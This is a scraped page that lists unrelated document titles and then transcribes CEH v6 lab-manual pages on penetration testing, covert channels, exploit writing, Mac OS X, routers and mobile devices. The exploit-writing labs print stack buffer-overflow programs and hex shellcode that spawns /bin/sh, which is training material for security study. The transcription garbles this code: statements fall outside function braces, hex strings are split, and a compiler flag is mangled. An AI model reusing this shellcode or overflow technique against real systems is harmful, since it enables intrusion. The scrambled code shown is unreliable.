Module 26. Penetration Testing



Similar documents
Using the Content Distribution Manager GUI

Accessing the Media General SSL VPN

Certified Ethical Hacker (CEH) Ethical Hacking & Counter Measures Course 9962; 5 Days, Instructor-Led

When a student leaves this intensive 5 day class they will have hands on understanding and experience in Ethical Hacking.

Setting Up Scan to SMB on TaskALFA series MFP s.

SecuraLive ULTIMATE SECURITY

Application Notes for Configuring Dorado Software Redcell Enterprise Bundle using SNMP with Avaya Communication Manager - Issue 1.

Virtual Owl. Guide for Windows. University Information Technology Services. Training, Outreach, Learning Technologies & Video Production

Integration Guide. Help Desk Authority, Perspective and sl

Hallpass Instructions for Connecting to Mac with a Mac

IS L06 Protect Servers and Defend Against APTs with Symantec Critical System Protection

Quick Reference Guide PAYMENT GATEWAY (Virtual Terminal)

Lab Configuring Access Policies and DMZ Settings

ez Agent Administrator s Guide

Connecting the DG-102S VoIP Gateway to your network

Lab Configure Cisco IOS Firewall CBAC

How to use SURA in three simple steps:

Installation Guide. Research Computing Team V1.9 RESTRICTED

How To Use A Help Desk With A Pnettrap On A Pc Or Mac Or Mac (For A Laptop)

User guide. Business

Installing and Configuring WhatsUp Gold

MiraCosta College now offers two ways to access your student virtual desktop.

EMR Link Server Interface Installation

Mapping ITS s File Server Folder to Mosaic Windows to Publish a Website

VERITAS Backup Exec 9.1 for Windows Servers Quick Installation Guide

Acunetix Web Vulnerability Scanner. Getting Started. By Acunetix Ltd.

EZblue BusinessServer The All - In - One Server For Your Home And Business

Maintenance Guide. Outpost Firewall 4.0. Personal Firewall Software from. Agnitum

You may refer the Quick Installation Guide in the package box for more information.

McAfee.com Personal Firewall

Citrix Access Gateway Plug-in for Windows User Guide

Lab - Configure a Windows 7 Firewall

During your session you will have access to the following lab configuration. CLIENT1 (Windows XP Workstation) /24

IBM Security SiteProtector System Configuration Guide

School of Information Science (IS 2935 Introduction to Computer Security, 2003)

FREQUENTLY ASKED QUESTIONS

Secure Web Development Teaching Modules 1. Security Testing. 1.1 Security Practices for Software Verification

Remote Access: Internet Explorer

Configuring Devices for Use with Cisco Configuration Professional (CCP) 2.5

WhatsUp Gold v16.1 Installation and Configuration Guide

Net 2. NetApp Electronic Library. User Guide for Net 2 Client Version 6.0a

Lab 4.4.8a Configure a Cisco GRE over IPSec Tunnel using SDM

Issue Tracking Anywhere Installation Guide

Certified Secure Computer User

SSH Secure Client (Telnet & SFTP) Installing & Using SSH Secure Shell for Windows Operation Systems

In this lab you will explore the Windows XP Firewall and configure some advanced settings.

NETGEAR genie Apps. User Manual. 350 East Plumeria Drive San Jose, CA USA. August v1.0

Configuring Security for FTP Traffic

TERAcloud w w w. t e r a c l o u d. u k

FortKnox Personal Firewall

Metasys System Direct Connection and Dial-Up Connection Application Note

Tunnels and Redirectors

Sophos for Microsoft SharePoint startup guide

Protecting the Home Network (Firewall)

Access the TCNJ Palo Alto Networks VPN using the GlobalProtect VPN client

Follow the instructions below for first-time users only

SSL VPN Service. Once you have installed the AnyConnect Secure Mobility Client, this document is available by clicking on the Help icon on the client.

Sage Intelligence Financial Reporting for Sage ERP X3 Version 6.5 Installation Guide

How To Install A Cisco Vpn Client V4.9.9 On A Mac Or Ipad (For A University)

Crystal Reports Installation Guide

Connecting to the Internet. LAN Hardware Requirements. Computer Requirements. LAN Configuration Requirements

EZblue BusinessServer The All - In - One Server For Your Home And Business

Building a Penetration Testing Virtual Computer Laboratory

Lab - Configure a Windows XP Firewall

Windows Operating Systems. Basic Security

HDA Integration Guide. Help Desk Authority 9.0

Gigabyte Management Console User s Guide (For ASPEED AST 2400 Chipset)

OUTLOOK ANYWHERE CONNECTION GUIDE FOR USERS OF OUTLOOK 2010

Brazosport College VPN Connection Installation and Setup Instructions. Draft 2 March 24, 2005

Contents. McAfee Internet Security 3

Print Server Application Guide

Sophos Enterprise Console Help. Product version: 5.1 Document date: June 2012

5.6.2 Optional Lab: Restore Points in Windows Vista

Desktop Surveillance Help

System Administration Training Guide. S100 Installation and Site Management

Installation Manual for Multi-purpose Ecological Risk Assessment and Management Tool (AIST-MeRAM) For Windows 8

Configuring NXT Hardware with Mercury Inside into Doors.NET TM Application Note

Tournament Pairing Program Installation Instructions for Windows 7

Creating client-server setup with multiple clients

Make a folder named Lab3. We will be using Unix redirection commands to create several output files in that folder.

19 LCD / 8 CHANNEL DVR COMBO WITH 160GB HDD & 4 CAMERAS

PT Activity: Configure Cisco Routers for Syslog, NTP, and SSH Operations

Start Here. Installation Guide. Rosetta Stone Standalone License. This Guide Will Show You How To: Install the Student Management System...

VRC 7900/8900 Avalanche Enabler User s Manual

The RT module VT6000 (VT6050 / VT6010) can be used to enhance the RT. performance of CANoe by distributing the real-time part of CANoe to a

Spector 360 Deployment Guide. Version 7

Lab - Configure a Windows Vista Firewall

ReadyNAS Remote. User Manual. June East Plumeria Drive San Jose, CA USA

SETTING UP REMOTE ACCESS ON EYEMAX PC BASED DVR.

StarWind iscsi SAN Software: Installing StarWind on Windows Server 2008 R2 Server Core

Sharp Remote Device Manager (SRDM) Server Software Setup Guide

Virtual Code Authentication User Guide for Administrators

Chapter 15: Advanced Networks

Lab Configuring Access Policies and DMZ Settings

owncloud Configuration and Usage Guide

Firewalls. Chapter 3

BUILDER 3.0 Installation Guide with Microsoft SQL Server 2005 Express Edition January 2008

INSTALLING MICROSOFT SQL SERVER AND CONFIGURING REPORTING SERVICES

HP-1000 Powerline Ethernet Adapter

TSM for Windows Installation Instructions: Download the latest TSM Client Using the following link:

Transcription:

Module 26 Penetration Testing Page 633 Ethical Hacking and Countermeasures v6 Copyright

Lab 26-01 Objective: Use Azure Web Log to know details about your web traffic In the CEHv6 Labs CD-ROM, navigate to Module 26 Install and Launch Azure Web Log Start a New Project from Project -> New. Enter the data and click Ok Page 634 Ethical Hacking and Countermeasures v6 Copyright

Start a New Log File from File -> Add Log Page 635 Ethical Hacking and Countermeasures v6 Copyright

Click Hits and Refs Click Site Info Page 636 Ethical Hacking and Countermeasures v6 Copyright

Click Current Month Click Previous Month Page 637 Ethical Hacking and Countermeasures v6 Copyright

Click Year Hits Click Hour Page 638 Ethical Hacking and Countermeasures v6 Copyright

Click System Country Page 639 Ethical Hacking and Countermeasures v6 Copyright

Lab 26-02 Objective: Use iinventory to capture hardware & software inventory and registry keys without having to leave your desk. In the CEHv6 Labs CD-ROM, navigate to Module 26 Install and launch iinventory Click button Audit this PC in the left side pane. To start performance audit Page 640 Ethical Hacking and Countermeasures v6 Copyright

Performance Audit Report Click Scan Network button on the left side pane. Page 641 Ethical Hacking and Countermeasures v6 Copyright

Click Agent Builder Wizard on the left pane Set the options and click Next to forward to the next step Click Show Agent Config button on the left side pane Select an agent file from the list to display its summary Page 642 Ethical Hacking and Countermeasures v6 Copyright

Page 643 Ethical Hacking and Countermeasures v6 Copyright

Summary of agent configuration Page 644 Ethical Hacking and Countermeasures v6 Copyright

Lab 26-03 Objective: Use Link Utility to check links on Web sites and sustaining their efficiency. In the CEHv6 Labs CD-ROM, navigate to Module 26 Install and launch Link Utility Click New Project button Page 645 Ethical Hacking and Countermeasures v6 Copyright

Click Import from HTML File. Select a file to import site addresses from. Click Ok Page 646 Ethical Hacking and Countermeasures v6 Copyright

Click Settings button to change the present options Page 647 Ethical Hacking and Countermeasures v6 Copyright

Click Scan button. Click Yes Page 648 Ethical Hacking and Countermeasures v6 Copyright

Page 649 Ethical Hacking and Countermeasures v6 Copyright

Click on the Report to generate the report file Page 650 Ethical Hacking and Countermeasures v6 Copyright

Lab 26-04 Objective: Use MaxCrypt to perform automated computer encryption. In the CEHv6 Labs CD-ROM, navigate to Module 26 Install and launch MaxCrypt Click on New User to create a New User Now Login Page 651 Ethical Hacking and Countermeasures v6 Copyright

Click on the MaxCrypt icon in the windows system tray to access the MaxCrypt Quick Menu Click on Manage Volumes Page 652 Ethical Hacking and Countermeasures v6 Copyright

Click on Create Volume button to create a new volume Enter the data and click Create Volume Page 653 Ethical Hacking and Countermeasures v6 Copyright

The New Volume F:\ is created Page 654 Ethical Hacking and Countermeasures v6 Copyright

Click on the MaxCrypt icon in the windows system tray to access the MaxCrypt Quick Menu Click on Conceal Files Page 655 Ethical Hacking and Countermeasures v6 Copyright

Select a file and click Add button Page 656 Ethical Hacking and Countermeasures v6 Copyright

Finally Logout user Lab 26-05 Objective: Use Sniffem for monitoring network and capturing data traffic. In the CEHv6 Labs CD-ROM, navigate to Module 26 Install and launch Sniffem Page 657 Ethical Hacking and Countermeasures v6 Copyright

Page 658 Ethical Hacking and Countermeasures v6 Copyright

Click Settings button to modify the present settings Click Capture button to start capturing the activities Click Stop button to stop capturing Page 659 Ethical Hacking and Countermeasures v6 Copyright

Lab 26-06 Objective: Use SQL Stripes to monitor and control your SQL Servers. In the CEHv6 Labs CD-ROM, navigate to Module 26 Install and Launch SQL Stripes Click Yes Page 660 Ethical Hacking and Countermeasures v6 Copyright

Select Settings to modify the present options Page 661 Ethical Hacking and Countermeasures v6 Copyright

Select Server from the left side pane in the above window and click + symbol button in the right side pane to create a new server Enter details and click OK to create a new server Page 662 Ethical Hacking and Countermeasures v6 Copyright

Server 1 Created Check the Console Page 663 Ethical Hacking and Countermeasures v6 Copyright

Lab 26-07 Objective: Use TraceRoute Program to know the route over the network between two systems, listing of all the intermediate routers connected to its destination. In the CEHv6 Labs CD-ROM, navigate to Module 26 Install and launch TraceRoute Input URL www.juggyboy.com in the Address bar. Click Trace Page 664 Ethical Hacking and Countermeasures v6 Copyright

Trace Result Repeat the same for other sites Page 665 Ethical Hacking and Countermeasures v6 Copyright

Lab 26-08 Objective: Use Windows Security Officer to restrict the resources for an application In the CEHv6 Labs CD-ROM, navigate to Module 26 Install and Launch Windows Security Officer Initially click to change the administrator password Page 666 Ethical Hacking and Countermeasures v6 Copyright

Expand System 10 options in the left side pane Select Control Panel to modify the options Page 667 Ethical Hacking and Countermeasures v6 Copyright

Select Shell Restrictions to modify the options Select IE Browser Security to modify the options Page 668 Ethical Hacking and Countermeasures v6 Copyright

Page 669 Ethical Hacking and Countermeasures v6 Copyright

Select IE Cookies Viewer to modify the options Select Log User Activity to modify the options Page 670 Ethical Hacking and Countermeasures v6 Copyright

Select Restrict User Work Time to modify the options Select Folder Guard to modify the options Page 671 Ethical Hacking and Countermeasures v6 Copyright

Lab 26-09 In the CEHv6 Labs CD-ROM, navigate to Module 26 Open the Penetration Testing.pdf and read the content Develop a penetration test plan Page 672 Ethical Hacking and Countermeasures v6 Copyright

Lab 26-10 In the CEHv6 Labs CD-ROM, navigate to Module 26 Open the Software Penetration Testing.pdf and read the content Penetration testing today Page 673 Ethical Hacking and Countermeasures v6 Copyright

Module 27 Covert Hacking Page 674 Ethical Hacking and Countermeasures v6 Copyright

Lab 27-01 In the CEHv6 Labs CD-ROM, navigate to Module 27 Open the Covert Channel Analysis and Data Hiding in TCPIP.pdf and read the content Covert Channels Page 675 Ethical Hacking and Countermeasures v6 Copyright

Lab 27-02 In the CEHv6 Labs CD-ROM, navigate to Module 27 Open the Bypassing Firewall.pdf and read the content Firewall Piercing (Inside-Out Attacks) In the same PDF file, read the Examples of Covert Channel Attacks topic Page 676 Ethical Hacking and Countermeasures v6 Copyright

Lab 27-03 In the CEHv6 Labs CD-ROM, navigate to Module 27 Open the Covert Actions.pdf and read the content Covert channels are the principle enablers in a DDoS attack Page 677 Ethical Hacking and Countermeasures v6 Copyright

Lab 27-04 In the CEHv6 Labs CD-ROM, navigate to Module 27 Open the Covert channel vulnerabilities in anonymity systems.pdf and read the content Covert channels Page 678 Ethical Hacking and Countermeasures v6 Copyright

Module 30 Exploit Writing Page 679 Ethical Hacking and Countermeasures v6 Copyright

Lab 30-01 In the CEHv6 Labs CD-ROM, navigate to Module 30 Boot your computer using the BackTrack CD-ROM Open command shell and type: kedit example1.c Type the following in kedi: void function(int a, int b, int c) { char buffer1[5]; char buffer2[10]; } void main() { function(1,2,3); } Page 680 Ethical Hacking and Countermeasures v6 Copyright

Save the program in kedit. Compile the program by typing: $ gcc -S -o example1.s example1.c Page 681 Ethical Hacking and Countermeasures v6 Copyright

View the generated assembly file by typing: kedit example1.s Page 682 Ethical Hacking and Countermeasures v6 Copyright

Lab 30-02 example2.c In the CEHv6 Labs CD-ROM, navigate to Module 30 Create another program in kedit. Kedit example2.c Type the following: void function(char *str) { char buffer[16]; } strcpy(buffer,str); void main() { char large_string[256]; int i; for( i = 0; i < 255; i++) large_string[i] = 'A'; } function(large_string); Page 683 Ethical Hacking and Countermeasures v6 Copyright

Save the program in kedit. Page 684 Ethical Hacking and Countermeasures v6 Copyright

Compile the program by typing: $ gcc -o example2.s example2.c Page 685 Ethical Hacking and Countermeasures v6 Copyright

Run the program by typing:./example2.s Page 686 Ethical Hacking and Countermeasures v6 Copyright

You should see a segmentation fault error Page 687 Ethical Hacking and Countermeasures v6 Copyright

View the generated assembly file by typing: kedit example2.asm Page 688 Ethical Hacking and Countermeasures v6 Copyright

Lab 30-03 Objective: example3.c In the CEHv6 Labs CD-ROM, navigate to Module 30 Create another program in kedit. Kedit example3.c Type the following: void function(int a, int b, int c) { char buffer1[5]; char buffer2[10]; int *ret; ret = buffer1 + 12; (*ret) += 8; } void main() { int x; x = 0; function(1,2,3); x = 1; printf("%d\n",x); } Page 689 Ethical Hacking and Countermeasures v6 Copyright

Save the program and compile it by typing: $gcc o example3 example3.c Page 690 Ethical Hacking and Countermeasures v6 Copyright

Run the program by typing: $./example3 Page 691 Ethical Hacking and Countermeasures v6 Copyright

It should print one Disassemble main using gdb Type the following: $gdb example3 Page 692 Ethical Hacking and Countermeasures v6 Copyright

Type: disassemble main Page 693 Ethical Hacking and Countermeasures v6 Copyright

Page 694 Ethical Hacking and Countermeasures v6 Copyright

Lab 30-04 Objective: shellcode.c In the CEHv6 Labs CD-ROM, navigate to Module 26 Create another program in kedit Kedit shellcode.c Type the following: #include <stdio.h> void main() { char *name[2]; } name[0] = "/bin/sh"; name[1] = NULL; execve(name[0], name, NULL); Page 695 Ethical Hacking and Countermeasures v6 Copyright

Compile the program by typing: $ gcc -o shellcode -ggdb -static shellcode.c Page 696 Ethical Hacking and Countermeasures v6 Copyright

Type: $ gdb shellcode Then, type disassemble main. Page 697 Ethical Hacking and Countermeasures v6 Copyright

Type disassemble _execve Page 698 Ethical Hacking and Countermeasures v6 Copyright

Page 699 Ethical Hacking and Countermeasures v6 Copyright

Lab 30-05 Objective: exit.c In the CEHv6 Labs CD-ROM, navigate to Module 26 Create another program in kedit. Kedit exit.c Type the following: #include <stdlib.h> void main() { } exit(0); Compile the program using: $ gcc -o exit -static exit.c View the generated code gdb by typing: gdb exit Then: disassemble _exit Page 700 Ethical Hacking and Countermeasures v6 Copyright

Lab 30-06 Objective: testsc.c In the CEHv6 Labs CD-ROM, navigate to Module 26 Create another program in kedit. Kedit testsc.c Type the following: char shellcode[] = "\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x 00\x00" "\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\x cd\x80" "\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xd1\x ff\xff" "\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x89\xec\x5d\xc3"; void main() { int *ret; ret = (int *)&ret + 2; (*ret) = (int)shellcode; } Compile the program using: $ gcc -o testsc testsc.c Run the program by typing:./testsc You should see a shell launched. Type exit to exit the shell. Page 701 Ethical Hacking and Countermeasures v6 Copyright

Lab 30-07 Objective: exploit.c In the CEHv6 Labs CD-ROM, navigate to Module 26 Create another program in kedit Kedit exploit.c Type the following: char shellcode[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b " "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd " "\x80\xe8\xdc\xff\xff\xff/bin/sh"; char large_string[128]; void main() { } char buffer[96]; int i; long *long_ptr = (long *) large_string; for (i = 0; i < 32; i++) *(long_ptr + i) = (int) buffer; for (i = 0; i < strlen(shellcode); i++) large_string[i] = shellcode[i]; strcpy(buffer,large_string); Compile the program using: $ gcc -o exploit exploit.c Run the program by typing:./exploit You should see a shell launched Type exit to exit the shell Page 702 Ethical Hacking and Countermeasures v6 Copyright

Module 34 Mac OS X Hacking Page 703 Ethical Hacking and Countermeasures v6 Copyright

Lab 34-01 In the CEHv6 Labs CD-ROM, navigate to Module 34 Open the Securing Mac OS X.pdf and read the content Read the Security Hardening Guideline topic Page 704 Ethical Hacking and Countermeasures v6 Copyright

In the same PDF file, read the Data Encryption topic Page 705 Ethical Hacking and Countermeasures v6 Copyright

Lab 34-02 In the CEHv6 Labs CD-ROM, navigate to Module 34 Open the Security in Mac OS X.pdf and read the content Read the Secure Default Settings topic Page 706 Ethical Hacking and Countermeasures v6 Copyright

In the same PDF file, read the Modern Security Architecture topic Page 707 Ethical Hacking and Countermeasures v6 Copyright

Next, read the Strong Authentication topic Page 708 Ethical Hacking and Countermeasures v6 Copyright

Lab 34-03 In the CEHv6 Labs CD-ROM, navigate to Module 34 Open the Mac OS X 10.4 Security Checklist.pdf and read the content Read the OS X Security Architecture topic Page 709 Ethical Hacking and Countermeasures v6 Copyright

In the same PDF file, read the User Account Security topic Page 710 Ethical Hacking and Countermeasures v6 Copyright

Next, read the Securing System Preferences topic Page 711 Ethical Hacking and Countermeasures v6 Copyright

Lab 34-04 In the CEHv6 Labs CD-ROM, navigate to Module 34 Open the Mac OS X Hacking Poses Wide Risk to Windows.pdf and read the content Read the Mac OS X Hacking Poses Wide Risk for Windows topic Page 712 Ethical Hacking and Countermeasures v6 Copyright

Module 35 Hacking Routers, Cable Modems, and Firewalls Page 713 Ethical Hacking and Countermeasures v6 Copyright

Lab 35-01 In the CEHv6 Labs CD-ROM, navigate to Module 35 Open the Chapter 9-Firewalls.pdf and read the content Read the FIREWALL IDENTIFICATION topic Page 714 Ethical Hacking and Countermeasures v6 Copyright

Next, read the PACKET FILTERING topic Page 715 Ethical Hacking and Countermeasures v6 Copyright

Lab 35-02 In the CEHv6 Labs CD-ROM, navigate to Module 35 Open the CISCO ROUTERS AS TARGETS.pdf and read the content Read the Compromised Router Sniffing topic Page 716 Ethical Hacking and Countermeasures v6 Copyright

In the same PDF file, read the Why we need to protect router resources topic Next, read the Router Audit Tool topic Page 717 Ethical Hacking and Countermeasures v6 Copyright

Lab 35-03 In the CEHv6 Labs CD-ROM, navigate to Module 35 Open the Cisco Router Security Best Practices.pdf and read the content Read the Access management topic Page 718 Ethical Hacking and Countermeasures v6 Copyright

In the same PDF file, read the SNTP Security topic Page 719 Ethical Hacking and Countermeasures v6 Copyright

Next, read the Access control lists topic Page 720 Ethical Hacking and Countermeasures v6 Copyright

Lab 35-04 In the CEHv6 Labs CD-ROM, navigate to Module 35 Open the 8 steps to protect your Cisco router.pdf and read the content Page 721 Ethical Hacking and Countermeasures v6 Copyright

In the same PDF file, read the Encrypt all passwords topic Page 722 Ethical Hacking and Countermeasures v6 Copyright

Module 36 Hacking Mobile Phones, PDA, and Handheld Devices Page 723 Ethical Hacking and Countermeasures v6 Copyright

Lab 36-01 In the CEHv6 Labs CD-ROM, navigate to Module 36 Open the Take Control of Your iphone.pdf and read the content Read the QUICK START TO TAKING CONTROL OF AN iphone topic Page 724 Ethical Hacking and Countermeasures v6 Copyright

In the same PDF file, read the 8 QUICK TROUBLESHOOTING STEPS topic Page 725 Ethical Hacking and Countermeasures v6 Copyright

Next, read the AVOID NAVIGATION AND TYPING HASSLES topic Page 726 Ethical Hacking and Countermeasures v6 Copyright

Lab 36-02 In the CEHv6 Labs CD-ROM, navigate to Module 36 Open the iphone Hardware Unlock.pdf and read the content Page 727 Ethical Hacking and Countermeasures v6 Copyright

Lab 36-03 In the CEHv6 Labs CD-ROM, navigate to Module 36 Open the How to Unlock an iphone.pdf and read the content Page 728 Ethical Hacking and Countermeasures v6 Copyright

Lab 36-04 In the CEHv6 Labs CD-ROM, navigate to Module 36 Open the The Anatomy of a Hack.pdf and read the content. Read the Understanding the Threats to Your Mobile Workforce topic Page 729 Ethical Hacking and Countermeasures v6 Copyright

In the same PDF file, read the Anatomy of a Hack Video Companion Guide topic Page 730 Ethical Hacking and Countermeasures v6 Copyright

Lab 36-05 In the CEHv6 Labs CD-ROM, navigate to Module 36 Open the Mobile Handset Security.pdf and read the content Read the Security issues on mobile devices topic Page 731 Ethical Hacking and Countermeasures v6 Copyright

In the same PDF file, read the Threats and Attacks topic Page 732 Ethical Hacking and Countermeasures v6 Copyright

Lab 36-06 In the CEHv6 Labs CD-ROM, navigate to Module 36 Open the Mobile Malware Threats and Prevention.pdf and read the content Page 733 Ethical Hacking and Countermeasures v6 Copyright